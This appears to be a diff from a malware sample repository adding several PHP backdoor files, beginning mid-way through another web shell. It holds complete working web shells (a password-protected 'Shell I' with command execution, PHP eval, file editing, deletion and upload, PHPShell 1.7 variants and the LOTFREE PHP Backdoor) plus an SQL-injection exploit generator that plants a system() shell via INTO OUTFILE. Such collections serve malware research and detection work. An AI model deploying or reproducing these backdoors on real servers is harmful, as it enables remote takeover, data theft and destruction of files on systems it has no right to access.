for($i=0; $i<=$count; ++$i){
$res.=$ch."";
}
return $res;
}
function ex($comd) //Âûïîëíåíèå êîìàíäû
{
$res = '';
if (!empty($comd)){
if(function_exists('exec')){
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists('shell_exec')){
$res=shell_exec($comd);
}elseif(function_exists('system')){
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists('passthru')){
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
}
return $res;
}
function sysinfo() //Âûâîä SYSINFO
{
global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
echo("<b><font face=Verdana size=2> System information:<br><font size=-2>
<hr>");
echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
("Safe Mode: </b><font color=red>OFF</font><b> "));
$row_dis_func=explode(', ',$dis_func);
echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
echo ("MySQL: </b>");
if($mysql_stat){
echo "<font color=green>ON </font><b>";
}
else {
echo "<font color=red>OFF </font><b>";
}
echo "cURL: </b>";
if($curl_on){
echo "<font color=green>ON</font><b><br>";
}else
echo "<font color=red>OFF</font><b><br>";
if ($dis_func!=""){
echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
}
$uname=ex('uname -a');
echo "OS: </b><font color=blue>";
if (empty($uname)){
echo (php_uname()."</font><br><b>");
}else
echo $uname."</font><br><b>";
$id = ex('id');
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)){
echo $id."</font><br><b>";
}else
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
"</font><br><b>";
echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
}
echo "<hr size=3 color=black>";
echo "</font></font>";
}
function read_dir($dir) //÷èòàåì ïàïêó
{
$d=opendir($dir);
$i=0;
while($r=readdir($d)){
$res[$i]=$r;
$i++;
}
return $res;
}
function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ
$type=filetype($file);
$perms=$type[0];
$perms.=($mode & 00400) ? "r" : "-";
$perms.=($mode & 00200) ? "w" : "-";
$perms.=($mode & 00100) ? "x" : "-";
$perms.=($mode & 00040) ? "r" : "-";
$perms.=($mode & 00020) ? "w" : "-";
$perms.=($mode & 00010) ? "x" : "-";
$perms.=($mode & 00004) ? "r" : "-";
$perms.=($mode & 00002) ? "w" : "-";
$perms.=($mode & 00001) ? "x" : "-";
$perms.="(".$mode.")";
return $perms;
}
function open_file($fil, $m, $d) //Îòêðûòü ôàéë
{
if (!($fp=fopen($fil,$m))) {
$res="Error opening file!\n";
}else{
ob_start();
readfile($fil);
$res=ob_get_contents();
ob_end_clean();
if (!(fclose($fp))){
$res="ERROR CLOSE";
}
}
echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
echo "<table BORDER=1 align=center>";
echo "<tr><td alling=center><b> ".$fil." </b></td></tr>";
echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
echo $res;
echo "

588
PHP/Backdoor.PHP.Agent.au Normal file
View File

@ -0,0 +1,588 @@
<?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #33FF00;
background: #000000;
}
#d {
background: #003000;
}
#f {
background: #003300;
}
#s {
background: #006300;
}
#d:hover
{
background: #003300;
}
#f:hover
{
background: #003000;
}
pre {
font-size: 10px;
font-family: verdana;
color: #33FF00;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #33FF00;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #33FF00;
color: #33FF00;
border-top-color: #33FF00;
font-family: verdana;
border-right-width: 1px;
border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
//
//Page handling
//
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {
case 'cmd': //Run command
print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
if(isset($_REQUEST['command']))
{
print "<pre>";
execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
}
break;
case 'edit': //Edit a fie
if(isset($_POST['editform']))
{
$f = $_GET['file'];
$fh = fopen($f, 'w') or print "Error while opening file!";
fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
fclose($fh);
}
print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
if(file_exists($_GET['file']))
{
$rd = file($_GET['file']);
foreach($rd as $l)
{
print htmlspecialchars($l);
}
}
print "</textarea><input type=submit value=\"Save\"></form>";
break;
case 'delete': //Delete a file
if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}
break;
case 'eval': //Evaluate PHP code
print "<form action=\"".$me."?p=eval\" method=POST>
<textarea cols=60 rows=10 name=\"eval\">";
if(isset($_POST['eval']))
{
print htmlspecialchars($_POST['eval']);
}
else
{
print "print \"Yo Momma\";";
}
print "</textarea><br>
<input type=submit value=\"Eval\">
</form>";
if(isset($_POST['eval']))
{
print "<h1>Output:</h1>";
print "<br>";
eval($_POST['eval']);
}
break;
case 'chmod': //Chmod file
print "<h1>Under construction!</h1>";
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "file/path/please";
}
print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
<select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";
break;
case 'mysql': //MySQL Query
if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];
$result = mysql_query($sql);
}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";
}
break;
case 'createdir':
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;
case 'phpinfo': //PHP Info
phpinfo();
break;
case 'rename':
if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}
}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file']));
}
else
{
$file = "";
}
print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;
case 'md5':
if(isset($_POST['md5']))
{
if(!is_numeric($_POST['timelimit']))
{
$_POST['timelimit'] = 30;
}
set_time_limit($_POST['timelimit']);
if(strlen($_POST['md5']) == 32)
{
if($_POST['chars'] == "9999")
{
$i = 0;
while($_POST['md5'] != md5($i) && $i != 100000)
{
$i++;
}
}
else
{
for($i = "a"; $i != "zzzzz"; $i++)
{
if(md5($i == $_POST['md5']))
{
break;
}
}
}
if(md5($i) == $_POST['md5'])
{
print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
}
}
}
print "Will bruteforce the md5
<form action=\"".$me."?p=md5\" method=POST>
<b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
<b>Characters:</b><br><select name=\"chars\">
<option value=\"az\">a - zzzzz</option>
<option value=\"9999\">1 - 9999999</option>
</select>
<b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
<input type=submit value=\"Bruteforce md5\">
</form><br>*: if set_time_limit is allowed by php.ini";
break;
case 'headers':
foreach(getallheaders() as $header => $value)
{
print htmlspecialchars($header . ":" . $value)."<br>";
}
break;
}
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
$files = array();
$directories = array();
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}
print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.'))
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}
print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";
}
function login()
{
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
<form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
</form>";
}
function reload()
{
header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
}
function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}
$i = 0;
$total = "";
foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i)
{
$pre .= $dirparts[$p]."/";
$p++;
}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}
return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

146
PHP/Backdoor.PHP.Agent.av Normal file
View File

@ -0,0 +1,146 @@
<?php
define('PHPSHELL_VERSION', '1.7');
?>
<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>
<?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
</body>
</html>

133
PHP/Backdoor.PHP.Agent.aw Normal file
View File

@ -0,0 +1,133 @@
<?php
function good_link($link)
{
$link=ereg_replace("/+","/",$link);
$link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
$link=ereg_replace("/+","/",$link);
if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
if($link=="")$link=".";
return $link;
}
$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
$dir=good_link($dir);
$rep=opendir($dir);
chdir($dir);
if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($_REQUEST["down"]));
header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
readfile($_REQUEST["down"]);
exit();
}
?>
<html>
<head><title>LOTFREE PHP Backdoor v1.5</title></head>
<body>
<br>
<?php
echo "Actuellement dans <b>".getcwd()."</b><br>\n";
echo "<b>dir = '$dir'</b><br>\n";
echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
{
echo "<pre>\n";
system($_REQUEST['cmd']);
echo "</pre>\n";
}
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
{
if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
{
echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
}
else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
}
else echo "fichier trop gros!<br>\n";
}
if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
{
if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
else echo "Impossible de supprimer le fichier<br>\n";
}
?>
<hr>
<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
<?php
$t_dir=array();
$t_file=array();
$i_dir=0;
$i_file=0;
while($x=readdir($rep))
{
if(is_dir($x))$t_dir[$i_dir++]=$x;
else $t_file[$i_file++]=$x;
}
closedir($rep);
while(1)
{
?>
<tr>
<td width="20%" bgcolor="lightgray" valign="top">
<?php
if($x=each($t_dir))
{
$name=$x["value"];
if($name=='.'){}
elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
}
?>
</td>
<td width='78%'<?php
if($y=each($t_file))
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
else echo ">\n";
echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
}
else echo ">\n";
?>
</td>
<td valign='center' width='2%'<?php
if($y)
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'";
echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
}
else echo ">\n";
?></td>
</tr>
<?php
if(!$x && !$y)break;
}
?>
</table>
<hr>
<br>
<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
</form><br>
Uploader un fichier dans le repertoire courant :<br>
<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
<input type="submit" value="upl0ad!"></form><br>
<br>
<center>
PHP Backdoor Version 1.5<br>
by sirius_black / LOTFREE TEAM<br>
Execute commands, browse the filesystem<br>
Upload, download and delete files...<br>
<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
</center>
</body>
</html>

37
PHP/Backdoor.PHP.Agent.ax Normal file
View File

@ -0,0 +1,37 @@
<?php
?>
<html>
<head>
<title>|| .::News Remote PHP Shell Injection::. || </title>
</head>
<body>
<header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
<?php
if (isset($_POST['url'])) {
$url = $_POST['url'];
$path2news = $_POST['path2news'];
$outfile = $_POST ['outfile'];
$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
$sql = urlencode($sql);
$expurl= $url."?id=".$sql ;
echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
}
else
{
?>
Url to index.php: <br />
<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
Server Path to Shell: <br />
Full server path to a writable file which will contain the Php Shell <br />
<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
<input type = "submit" value = "Create Exploit"> <br /> <br />
<?php
}
?>
</body>
</html>

177
PHP/Backdoor.PHP.Agent.ay Normal file
View File

@ -0,0 +1,177 @@
<?php
define(´PHPSHELL_VERSION´, ´1.7´);
/*
**************************************************************
* PHP Shell *
**************************************************************
$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
PHP Shell is aninteractive PHP-page that will execute any command
entered. See the files README and INSTALL or http://www.gimpster.com
for further information.
Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
?>
<html>
<head>
<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title>
</head>
<body>
<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] -
[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br>
<?php
if (ini_get(´register_globals´) != ´1´) {
/* We´ll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == ´/´) {
$new_dir = $regs[1]; // ´cd /something/...´
} else {
$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like ´/foo/../bar´: */
$work_dir = exec(´pwd´);
?>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode(´/´, substr($work_dir, 1));
echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´;
if (!empty($work_dir_splitted[0])) {
$path = ´´;
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= ´/´ . $work_dir_splitted[$i];
printf(´<a xhref="%s?work_dir=%s">%s</a>/´,
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ´.´) {
echo "<option value="$work_dir" selected>Current Directory</option> ";
} elseif ($dir == ´..´) {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There´s no
parent directory then. */
} elseif (strrpos($work_dir, ´/´) == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value="/">Parent Directory</option> ";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
}
} else {
if ($work_dir == ´/´) {
echo "<option value="$work_dir$dir">$dir</option> ";
} else {
echo "<option value="$work_dir/$dir">$dir</option> ";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam(´/tmp´, ´phpshell´);
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == ´ls´) {
/* ls looks much better with ´ -F´, IMHO. */
$command .= ´ -F´;
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
<i>Copyright © 20042005, <a
href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
</body>
</html>

1312
PHP/Backdoor.PHP.Agent.az Normal file
View File

File diff suppressed because it is too large Load Diff

1413
PHP/Backdoor.PHP.Agent.ba Normal file
View File

File diff suppressed because it is too large Load Diff

349
PHP/Backdoor.PHP.Agent.bb Normal file
View File

@ -0,0 +1,349 @@
<!--
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
